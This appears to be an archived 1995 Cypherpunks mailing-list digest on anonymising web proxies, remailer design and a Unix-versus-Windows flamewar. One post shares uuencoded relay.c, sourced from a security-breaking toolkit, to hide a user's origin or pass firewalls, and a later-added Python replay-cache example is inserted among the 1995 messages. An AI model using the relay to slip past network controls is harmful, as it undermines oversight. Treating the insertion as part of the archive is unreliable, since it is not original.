Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

here it is...

CERN = http://www.cern.ch:911


after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


On Sun, 29 Jan 1995, Johnathan Corgan wrote:

> Date: Sun, 29 Jan 95 13:08:09 PST
> From: Johnathan Corgan <jcorgan@aeinet.com>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: CERN Web Proxy
> 
> Could someone post the host/port number of the proxy server at CERN?
> 
> Thanks,
> 
> Johnathan
> 
> 
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLywgCbJv5rDIkn05AQEywgH9G9oUYLp2kpIHGgB5Pp0S07iL33lblFv/
kuiP3i5++Pb2112wxGeLyLAqRxdd8mQQqMR5R0HFJRu3n20x4j3F/A==
=I1zC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 29 Jan 95 17:18:58 PST
To: cypherpunks@toad.com
Subject: Re: Six month mail processing delay :-)
In-Reply-To: <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>
Message-ID: <e72BlyczBG06075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>, you wrote:

> This morning, I got the following message.  Note the dates on it.
> 
> Nothing like taking one's time.  You'd begin to think the government was 
> somehow involved.
> 
> -----BEGIN INCLUDED MESSAGE-----
> 
> >From MAILER-DAEMON@mtv.comSun Jan 29 16:25:27 1995
> Date: Sun, 29 Jan 1995 16:46:32 -0500
             ^^^^^^^^^^^
> From: Mail Delivery Subsystem <MAILER-DAEMON@mtv.com>
> To: hayden@krypton.mankato.msus.edu
> Subject: Returned mail: unknown mailer error 1
> 
> The original message was received at Tue, 24 May 1994 09:49:16 -0500
                                            ^^^^^^^^^^^
> from root@localhost


Now THAT'S what I call LATENCY!


                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLywiveVevBgtmhnpAQEPigL+PjGcu5lvmSlqw9uNslBy0iLjfTUqYX0g
GtKFF8lCyr40GzHUWhCVAPHGXZ+lDI7LoGoB5SRKzX99gsNp5almfcTLkgi8ZZE5
eHmahsV3o67wA47TPlpTE/JfB9+gR4V3
=rf4O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 15:33:40 PST
To: cypherpunks@toad.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501280307.AA20529@snark.imsi.com>
Message-ID: <Pine.3.89.9501291438.A12603-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


Notice that my thread title -- was humorous and self mocking
"Even more holy wars on unix", and that the 
articles that I posted were very funny.


Whereas Perry -- the salesman who refused to take 
yes for an answer when dealing with Netscape --  is 
filled with passionate rage.

What is up Perry -- do you have piles, or is the 
sawdust and chickenshit diet putting your temper 
on a short fuse?

One can reasonably argue, as he is now arguing, 
that unix is a good modern development environment.  
I think he is wrong -- I was amused at how unix folk 
were impressed at how I casually put up windows gui 
interface for a throwaway program that would
only be used once.

But it is a position that a rational person could 
reasonably believe, and might reasonably argue if 
this was the GUI development list and not the 
cypherpunks list.

But to claim, as some have claimed, that unix is 
as user friendly as Windows or the Mac, when 
suitably configured -- is a sign of utter irrationality 
that shows that those who assert such a fantastic claim 
are incapable of rational thought or rational
discussion on the topic.

The letters I have received also give ample evidence that 
those who hold this view are incapable of rational 
discussion on the matter.

The Holy bible attitude to unix is illustrated by the 
fact that the most flagrant and outrageous unix bugs 
are held to be correct behavior by definition -- 
"Unix does this, therefore it is right, and if you 
destroy your files as a result of this behavior then 
unix is right, and you are wrong."

Now one can argue that unix has bugs and DOS has 
bugs, but unix people, or at least those of them 
so irrational as to make the claim that Unix is 
user friendly, confronted with a unix bug, proclaim 
that the bug is right, and DOS is wrong for not 
having the bug.


For example I received numerous letters arguing that
the unix "mv" command is more powerful than the separate
DOS "replace" and "rename" commands.

This is like arguing that a combination hairbrush and 
chainsaw is more powerful than having two separate
tools, one a hairbrush and one a chainsaw.  One can
plausibly claim that such a tool is indeed powerful,
but that is hardly the point.


-
 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 15:48:33 PST
To: Cypherpunks Mailing List <nobody@flame.sinet.org>
Subject: Re: CERN Web Proxy
Message-ID: <Chameleon.4.01.950129154825.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> CERN = http://www.cern.ch:911
>
>Error 403
>
>Forbidden - by rule 
>
>
>CERN httpd 3.0

This is what you get if you interpret the above as a URL...which makes
sense since that was how it was posted.

What it really is is the host name and port name to configure your
Web browser so that all your HTTP traffic is funnelled through CERN
first, and then relayed from there to the destination.  I don't know
how Mosaic supports this, but under Netscape for Windows, it is under
Options | Preferences | Mail and Proxies | HTTP Proxy.

While this doesn't provide complete anonymity, it does prevent your 
email address, site name, etc. from appearing in the log files of the 
HTTP server you are connecting to.

I'm not sure why CERN has this running, but it is pretty useful
nonetheless. 

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 15:53:25 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <m0rYj3r-0006U8C@myriad.pc.cc.cmu.edu>
Message-ID: <Pine.SUN.3.91.950129155019.2430A-100000@bach.seattleu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

you need to enter the proxy address in your preferences.  this is not a 
site to http to.

in your prefs there is a section on proxies.  put the address and port 
number in there.  this is already set for NCSA Mosaic, all you have to do 
is click on the button next to USE CERN PROXY SERVICE.  for netscape, 
just enter www.cern.ch in the http proxy section and 911 as the port number.

- -pjf

after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


On Sun, 29 Jan 1995, Anonymous wrote:

> > CERN = http://www.cern.ch:911
> 
> Error 403
> 
> Forbidden - by rule 
> 
> 
> CERN httpd 3.0
> 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLywqZrJv5rDIkn05AQH8lwH/Vb9EOttY159tZIfGHchfITAUmkBRmfeM
9M+ZARdRf5/to0LwR1fEwj1P96eXv52wC8MPmNIDIh9fnO4L21OsoQ==
=Ea5t
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 16:16:16 PST
To: cypherpunks@toad.com
Subject: Data Bank Protocols
Message-ID: <ab51de62020210047c49@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


See ftp://ftp.netcom.com/pub/Si/Silk/DataBank.txt
for updated proposal for DataBank protocols. I have addressed, to a degree,
points made by Eric, and corrected the blunders pointed out by
jpp@markv.com. I am glad to e-mail this to anyone for whom ftp is awkward.

Thanks all.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sun, 29 Jan 95 14:32:43 PST
To: Cypherpunks Mailing List <LSTOWN-L@SEARN.SUNET.SE>
Subject: Six month mail processing delay :-)
Message-ID: <Pine.ULT.3.91.950129162530.717E-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just HAD to forward this message I received.  About 9 months ago I
joined Adam Curry's "CyberSleaze" mailing list.  About a month later I
unsubscribed.  The messages continued to come and I tried unsubscribing 
several more times.

Finally I set up a filter rule to flush the message and sent some grumpy 
email to the postmaster of the site telling them to fix their software 
(this was about mid-June of 1994).

This morning, I got the following message.  Note the dates on it.

Nothing like taking one's time.  You'd begin to think the government was 
somehow involved.

-----BEGIN INCLUDED MESSAGE-----

From MAILER-DAEMON@mtv.comSun Jan 29 16:25:27 1995
Date: Sun, 29 Jan 1995 16:46:32 -0500
From: Mail Delivery Subsystem <MAILER-DAEMON@mtv.com>
To: hayden@krypton.mankato.msus.edu
Subject: Returned mail: unknown mailer error 1

The original message was received at Tue, 24 May 1994 09:49:16 -0500
from root@localhost

   ----- The following addresses had delivery problems -----
"|/home/server/catmail -f -L CYBER-SLEAZE"  (unrecoverable error)
    (expanded from: daemon)

   ----- Transcript of session follows -----
554 "|/home/server/catmail -f -L CYBER-SLEAZE"... unknown mailer error 1

   ----- Original message follows -----

  [ Part 2: "Included Message" ]

Date: Tue, 24 May 1994 08:54:59 -0500 (CDT)
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
To: cyber-sleaze@mtv.com

unsubscribe

------END INCLUDED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 16:41:18 PST
To: Joe Turner <turner@telecheck.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501280817.AA15280@TeleCheck.com>
Message-ID: <Pine.3.89.9501291647.A14175-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Joe Turner wrote:
> I mean so what if 
> it doesn't come with a pretty shrink wrapped package and a thick 
> getting-started, if you have a question just go find the source code.  
> Geez.  

The above appears to have been written with the complete
seriousness and genuine sincerity that is usual among unix
fans.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 29 Jan 95 16:46:11 PST
To: Joe Turner <turner@telecheck.com>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <9501280817.AA15280@TeleCheck.com>
Message-ID: <Pine.3.89.9501291649.A14175-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 28 Jan 1995, Joe Turner wrote:
> Additionally, I don't know of too many operating 
> systems where the source code is floating around.  I mean so what if 
> it doesn't come with a pretty shrink wrapped package and a thick 
> getting-started, if you have a question just go find the source code.  
> Geez.  

There are some communities of software developers that have 
this strange belief that program behavior should conform to user
expectations instead of the user conforming to the program
behavior.


Your other remarks are rational, relevant, appropriate, and correct,
but this remark illustrates magnificently why unix is
still user hostile after all these years.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sun, 29 Jan 95 16:04:13 PST
To: jamesd@netcom.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <Pine.3.89.9501291438.A12603-0100000@netcom4>
Message-ID: <m0rYjat-0004IhC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> Whereas Perry -- the salesman who refused to take 
> yes for an answer when dealing with Netscape --  is 
> filled with passionate rage.
> 
> What is up Perry -- do you have piles, or is the 
> sawdust and chickenshit diet putting your temper 
> on a short fuse?

While there may be something said for Perry's technical expertise, that
certainly doesn't excuse his rudeness.

> One can reasonably argue, as he is now arguing, 
> that unix is a good modern development environment.  
> I think he is wrong -- I was amused at how unix folk 
> were impressed at how I casually put up windows gui 
> interface for a throwaway program that would
> only be used once.

That all depends on what you are expecting in a development environment, and
what the goal of the development project is.  If your goal is to quickly
produce a GUI interface, then Windows and VB is indeed the way to go.  VB
has reasonable debugging facilities built in.  Not quite as good as gdb,
but reasonable.

If your goal is to produce non-GUI code, then UNIX offers a superior development
environment.

No operating system can be all things to all people (much as Bill Gates would
like that to happen).  Most UNIX systems suck at doing real-time processing,
and most Windows systems suck at doing anything approaching preemptive
multitasking.  The right tool for the right job - why make one environment
or the other do everything?

I've been hacking UNIX for 10 years, and doing Windows programming for almost
that long, so I've seen both environments, and know that one size *doesn't*
fit all.

> But to claim, as some have claimed, that unix is 
> as user friendly as Windows or the Mac, when 
> suitably configured -- is a sign of utter irrationality 
> that shows that those who assert such a fantastic claim 
> are incapable of rational thought or rational
> discussion on the topic.

It could be argued by some that UNIX is even less user-friendly than
MS-DOS, but that comes from the fact that UNIX wasn't designed to be anything
approaching a production system.  It was written by programmers for
programmers to hack on.

> The Holy bible attitude to unix is illustrated by the 
> fact that the most flagrant and outrageous unix bugs 
> are held to be correct behavior by definition -- 
> "Unix does this, therefore it is right, and if you 
> destroy your files as a result of this behavior then 
> unix is right, and you are wrong."

I'd say "UNIX does it *this* way, therefore it's correct ... for UNIX."
Different OS's do things differently.  Windows is designed to hold the
user's hand.  UNIX isn't.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 29 Jan 95 17:57:14 PST
To: nzook@bga.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <199501300156.RAA29144@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Of course it was Chaum himself in his 1981 paper (which I think is available
from the CP FTP site) who described the duplicate-message attack.  I don't
see that inter-remailing encryption helps much, because the attacker can
still notice that whenever they inject message A, _something_ goes to
Bob.  The real solution, as Chaum pointed out, is that the remailer must
reject duplicate messages, even when separated by days.  Doing this without
keeping a database of all messages ever sent is left as an exercise.

Another aspect worth mentioning is that message splitting can make the
kinds of statistical correlations that Wei Dai was looking at more of
a danger.  It's one thing if I send a message along with thousands of
other people, and Bob gets a message along with everyone else.  But if I
send 10 messages and Bob gets 10 from that batch, that fact alone can
help to link us up.  So splitting my big message into 10 standard ones
isn't that great if they're all sent at once.  Ideally you'd want to
dribble them out at some standard rate, a rate at which you always send
a message whether you have something to send or not.  But this may introduce
unacceptable latency.

Hal
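
One way a remailer could reject duplicates without keeping every message ever sent, as an added example that is not part of the original message or of any remailer's code. It assumes each packet carries an expiry inside the part only the remailer can decrypt (not something proposed in this thread), uses SHA-256 where the thread says MD5, and uses a constructed toy framing in place of PGP's length field.

```python
import hashlib
import struct

# Constructed toy framing for the plaintext a remailer holds after decrypting
# a packet with its own key: 4-byte body length, 8-byte expiry (Unix seconds),
# then the body.  Bytes past `length` are ignored, as with PGP's length field.
HEADER = struct.Struct(">IQ")


def build_packet(body: bytes, expiry: int, junk: bytes = b"") -> bytes:
    """Frame a body; `junk` models random padding tacked on to the end."""
    return HEADER.pack(len(body), expiry) + body + junk


def parse_packet(packet: bytes):
    """Return (expiry, body), ignoring anything after the declared length."""
    if len(packet) < HEADER.size:
        raise ValueError("packet shorter than header")
    length, expiry = HEADER.unpack_from(packet)
    body = packet[HEADER.size:HEADER.size + length]
    if len(body) != length:
        raise ValueError("truncated body")
    return expiry, body


def naive_fingerprint(packet: bytes) -> bytes:
    """Hash of the raw bytes: changes whenever trailing padding changes."""
    return hashlib.sha256(packet).digest()


def canonical_fingerprint(packet: bytes) -> bytes:
    """Hash of only the length-delimited part, so padding cannot hide a replay."""
    expiry, body = parse_packet(packet)
    return hashlib.sha256(HEADER.pack(len(body), expiry) + body).digest()


class ReplayCache:
    """Remembers fingerprints only until the packet's own expiry.

    A packet past its expiry is refused outright, so forgetting its
    fingerprint is safe and storage is bounded by max_lifetime of traffic.
    """

    def __init__(self, max_lifetime: int):
        self.max_lifetime = max_lifetime
        self._seen = {}  # fingerprint -> expiry

    def pending(self) -> int:
        return len(self._seen)

    def accept(self, packet: bytes, now: int) -> str:
        # Drop fingerprints whose packets can no longer be accepted anyway.
        for fp in [fp for fp, exp in self._seen.items() if exp <= now]:
            del self._seen[fp]
        expiry, _ = parse_packet(packet)
        if expiry <= now:
            return "expired"
        if expiry - now > self.max_lifetime:
            return "lifetime-too-long"   # would pin a cache entry for too long
        fp = canonical_fingerprint(packet)
        if fp in self._seen:
            return "replay"
        self._seen[fp] = expiry
        return "accepted"


if __name__ == "__main__":
    now = 791_000_000                      # constructed clock value
    cache = ReplayCache(max_lifetime=7 * 86400)
    first = build_packet(b"to: bob\n\nhello", now + 3600)
    print(cache.accept(first, now))                      # first delivery
    print(cache.accept(first + b"\x5a" * 64, now + 60))  # resent with padding
    print(cache.accept(first, now + 3600))               # resent after expiry
```
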




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sun, 29 Jan 95 14:55:34 PST
To: cypherpunks@toad.com
Subject: Telnet Acrobatics
Message-ID: <m0rYiZL-0006TuC@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


What follows are two small programs which I thought might be of interest to
cypherpunks.  The first (socket.c) is a simple daemon which binds a port
and accepts connections, and then forks child processes for each one.
The second (relay.c) is a simple telnet program which opens a connection to
the specified remote host and port number.  Put together they can be used
as a telnet relay ("proxy server") that works like the term redir command.
This in itself is useful, if you want to hide where you're coming in from,
bypass a broken router or get through a firewall.  But, take a look at the
loop at the end of the second program.  It simply reads input from one
socket and writes it to another.  It would seem to me very easy to add
an encryptor/decryptor to this process and encrypt your telnet sessions.
You'd just need to exchange a key (via PGP) with the remote system, and
decide on a port number, then run crypt/dec daemons on both systems.  The
socket.c program might also be useful for socket-based remailing.  (Tho
you can set it up in your inetd.conf instead, if you have root access.)

However, I'm having a bit of trouble compiling these on some platforms.
I do not know who the original author is.  (These came out of a toolkit
for breaking system security and the author did not want to be known.)
After including a few additional libraries, I was able to compile both
under Linux, and it seems to work reasonably well.  They'll also
compile under SunOS, if you include <sys/termios.h>, but it won't
handle non-blocking I/O correctly, and can hang.  I can't get relay.c
to compile under Ultrix, though socket.c seems to work.  socket.c also
has a tendency to leave zombie processes hanging under Linux.

Anyone want to take a shot at debugging/porting it on other platforms
or adding crypto?

begin 644 relay.c
M(VEN8VQU9&4@/'-T9&EO+F@^"B-I;F-L=61E(#QN971D8BYH/@HC:6YC;'5D
M92`\<WES+W1Y<&5S+F@^"B-I;F-L=61E(#QS>7,O9FEL92YH/@HC:6YC;'5D
M92`\;F5T:6YE="]I;BYH/@HC:6YC;'5D92`\<WES+W-O8VME="YH/@HC:6YC
M;'5D92`\97)R;F\N:#X*(VEN8VQU9&4@/&9C;G1L+F@^"B-I;F-L=61E(#QS
M>7,O:6]C=&PN:#X*(VEN8VQU9&4@/'5N:7-T9"YH/@HC:6YC;'5D92`\<WES
M+W1I;64N:#X*+RHC:6YC;'5D92`\<WES+W1E<FUI;W,N:#XJ+R`@+RH@4F5Q
M=6ER960@9F]R(%-U;D]3("AB=70@;F]T($QI;G5X*2`J+PH*=F]I9"!M86EN
M*&EN="!A<F=C+&-H87(@*BIA<F=V*0I["B`@<F5G:7-T97(@8VAA<B`@("`@
M("`J<#L*("!R96=I<W1E<B!C:&%R("`@("`@("ID97-T.PH@(')E9VES=&5R
M(&EN="!X.PH@(&-H87(@:&]S=&YA;65;,C4V73L*("!I;G0@861D<CL*("!I
M;G0@8V]N;F5C=&EO;E]O:SL*("!S=')U8W0@:&]S=&5N="`J:&]S=#L*("!I
M;G0@<F5M;W1E9F0["B`@:6YT(&9D.PH@('-T<G5C="!S;V-K861D<E]I;B!R
M96UO=&5S97)V97(["B`@=6YS:6=N960@8VAA<B!C.PH@(&9D7W-E="!R96%D
M9F1S.PH@(&9D7W-E="!W<FET969D<SL*("!F9%]S970@97AC97!T9F1S.PH@
M('-T<G5C="!T97)M:6]S('1I;W-T<CL*("!I;G0@<CTQ.PH@(&EN="!W/3$[
M"B`@8VAA<B!B=69F97);,3`R-%T["B`@:6YT(&\["B`@"B`@<W1R8W!Y*&AO
M<W1N86UE+&%R9W9;,5TI.PH@(&AO<W0@/2!G971H;W-T8GEN86UE("AH;W-T
M;F%M92D["B`@:68@*"%H;W-T*2!P<FEN=&8H(B5S.B!U;FMN;W=N(&AO<W1<
M;B(L(&AO<W1N86UE*3L*("!B8V]P>2`H:&]S="T^:%]A9&1R+"`F861D<BP@
M-"D["B`@<F5M;W1E<V5R=F5R+G-I;E]F86UI;'D@/2!H;W-T+3YH7V%D9')T
M>7!E.PH@(')E;6]T97-E<G9E<BYS:6Y?<&]R="`](&AT;VYS*&%T;VDH87)G
M=ELR72DI.PH@(`H@('`@/2`H8VAA<B`J*2HH:&]S="T^:%]A9&1R7VQI<W0I
M.PH@(&9O<B`H9&5S="`]("AC:&%R("HI)G)E;6]T97-E<G9E<BYS:6Y?861D
M<BP@>"`](&AO<W0M/FA?;&5N9W1H.R`M+7@@/CT@,#L@*0H@("`@*F1E<W0K
M*R`]("IP*RL["B`@"B`@<F5M;W1E9F0@/2!S;V-K970H:&]S="T^:%]A9&1R
M='EP92P@4T]#2U]35%)%04TL(#`I.PH*("!C;VYN96-T:6]N7V]K(#T@8V]N
M;F5C="`H<F5M;W1E9F0L("AS=')U8W0@<V]C:V%D9'(@*BDF<F5M;W1E<V5R
M=F5R+"!S:7IE;V8H<F5M;W1E<V5R=F5R*2D["@H@(&EF("AC;VYN96-T:6]N
M7V]K(#P@,"D*("`@('L*("`@("`@<')I;G1F("@B0V]N;F5C=&EO;B!%<G)O
M<EQN(BD["B`@("`@(&9F;'5S:"`H<W1D;W5T*3L*("`@('T*"B`@+RH@3VMA
M>2P@8V]N;F5C=&EO;B!E<W1A8FQI<VAE9"X@*B\*"B`@9F-N=&PH<F5M;W1E
M9F0L($]?3D].0DQ/0TLI.PH@(&9D/3`["B`@9F-N=&PH9F0L($]?3D].0DQ/
M0TLI.PH*("!I;V-T;"AF9"P@1DE/3D))3RP@*&EN="`J*3$I.R`O*B!.;VXM
M0FQO8VMI;F<@22]/("HO"B`@:6]C=&PH<F5M;W1E9F0L($9)3TY"24\L("AI
M;G0@*BDQ*3L*("`*("!I;V-T;"AF9"P@5$-'1513+"`F=&EO<W1R*3L*("!T
M:6]S='(N8U]L9FQA9STP.R`O*B!$:7-A8FQE(&%L;"!P<F]C97-S:6YG.R!U
M;F%L=&5R960@."UB:70@8VAA;FYE;"`J+PH@('1I;W-T<BYC7VEF;&%G/3`[
M"B`@=&EO<W1R+F-?;V9L86<],#L*("!T:6]S='(N8U]C8UM624Y44ET],#L*
M("!T:6]S='(N8U]C8UM6455)5%T],#L*("!T:6]S='(N8U]C8UM614]&73TP
M.PH@(&EO8W1L*&9D+"!40U-%5%,L("9T:6]S='(I.PH*("!I;V-T;"AR96UO
M=&5F9"P@5$-'1513+"`F=&EO<W1R*3L*("!T:6]S='(N8U]L9FQA9STP.R`O
M*B!$:7-A8FQE(&%L;"!P<F]C97-S:6YG.R!U;F%L=&5R960@."UB:70@8VAA
M;FYE;"`J+PH@('1I;W-T<BYC7VEF;&%G/3`["B`@=&EO<W1R+F-?;V9L86<]
M,#L*("!I;V-T;"AR96UO=&5F9"P@5$-31513+"`F=&EO<W1R*3L*("`*("!&
M1%]:15)/*"9W<FET969D<RD["B`@1D1?6D523R@F97AC97!T9F1S*3L*("`*
M("!W:&EL92AR(3TP)B9W(3TP*2!["B`@("!&1%]:15)/*"9R96%D9F1S*3L*
M("`@($9$7U-%5"AF9"P@)G)E861F9',I.PH@("`@1D1?4T54*')E;6]T969D
M+"`F<F5A9&9D<RD["B`@("!S96QE8W0H,38L("9R96%D9F1S+"`F=W)I=&5F
M9',L("9E>&-E<'1F9',L*'-T<G5C="!T:6UE=F%L("HI,"D["B`@("`O*B!4
M:&ES('=O<FMS(&)U="!I<R!W87D@=&]O('-L;W<N+BX@*B\*("`@("\J=SUR
M96%D*&9D+"9C+#$I.VEF("AW/C`I('=R:71E*')E;6]T969D+"9C+#$I.RHO
M"B`@("`O*G(]<F5A9"AR96UO=&5F9"PF8RPQ*3MI9B`H<CXP*2!W<FET92AF
M9"PF8RPQ*3LJ+PH@("`@=SUR96%D*&9D+&)U9F9E<BPQ,#(T*3MI9B`H=SXP
M*0H@("`@>PH@("`@("!O/3`["B`@("`@('=H:6QE*&\\=RD@;SUW<FET92AR
M96UO=&5F9"QB=69F97(K;RQW+6\I.PH@("`@?0H@("`@<CUR96%D*')E;6]T
M969D+&)U9F9E<BPQ,#(T*3MI9B`H<CXP*0H@("`@>PH@("`@("!O/3`["B`@
M("`@('=H:6QE*&\\<BD@;SUW<FET92AF9"QB=69F97(K;RQR+6\I.PH@("`@
L?0H@('T*"B`@8VQO<V4H<F5M;W1E9F0I.PH@(&-L;W-E*&9D*3L*("`*?0H@
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@myriad.pc.cc.cmu.edu (Matthew Ghio)
Date: Sun, 29 Jan 95 15:01:09 PST
To: cypherpunks@toad.com
Subject: Telnet Acrobatics
Message-ID: <m0rYies-0006U0C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


BTW, usage is

socket <portnumber> command
relay <hostname> <portnumber>

You can combine them to make a telnet relay/forwarder with:

socket <localport> relay <hostname> <remoteport>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.sinet.org (Anonymous)
Date: Sun, 29 Jan 95 15:26:58 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: CERN Web Proxy
In-Reply-To: <Pine.SUN.3.91.950129150751.28793B-100000@bach.seattleu.edu>
Message-ID: <m0rYj3r-0006U8C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


random walk <pfinerty@seattleu.edu> wrote

> here it is...
> 
> CERN = http://www.cern.ch:911

Error 403

Forbidden - by rule 


CERN httpd 3.0




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Sun, 29 Jan 95 18:46:12 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Specs
Message-ID: <ab5202cf020210040e81@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>In article <Pine.SUN.3.91.950128194321.1158A-100000@unix2.netaxs.com>
>grendel@netaxs.com (Michael Handler) writes:
>>On Sat, 28 Jan 1995, Rhys Kyraden wrote:
>>
>>>         Since I have begun the project of writing the Remailer for the Mac,
>>> I suddenly realized that I do not know exactly what is expected of it, and
>>> therefore would like some pointers to the specs of a remailer (I have seen
>>> references to padding and splitting but do not know what this is nor how to
>>> implement it.)
>>
>>       I've started work on a formal remailer standards document that
>>describes just how a Cypherpunk Type I remailer should process messages,
>>with full header descriptions, etc. After I've checked it against the
>>behaviors of all the various Cypherpunk remailer packages (Ghio vs Eric
>>Hollander vs Sameer vs Mixmaster in compatibility mode vs whatever else),
>>I'll post it here for comments.
>
>Cypherpunk Type I?  Ok, what are the other types?  Should there be a
>type specification like there is for RAID, or the Body Armor Threat
>levels?
>
<SNIP>
>---------------------------------------------------------|
>| #include "std/disclaimer.h"     Michael P. Brininstool |
>| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
>|---------------------------------------------------------

He specifies type 1 to differentiate it from what I have been calling type
2, the message format used by mixmaster remailers.

Essay on Mixmaster available on my WWW page.

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig A. Johnston" <caj@tower.techwood.org>
Date: Sun, 29 Jan 95 18:48:09 PST
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950129195932.7990A-100000@krypton.mankato.msus.edu>
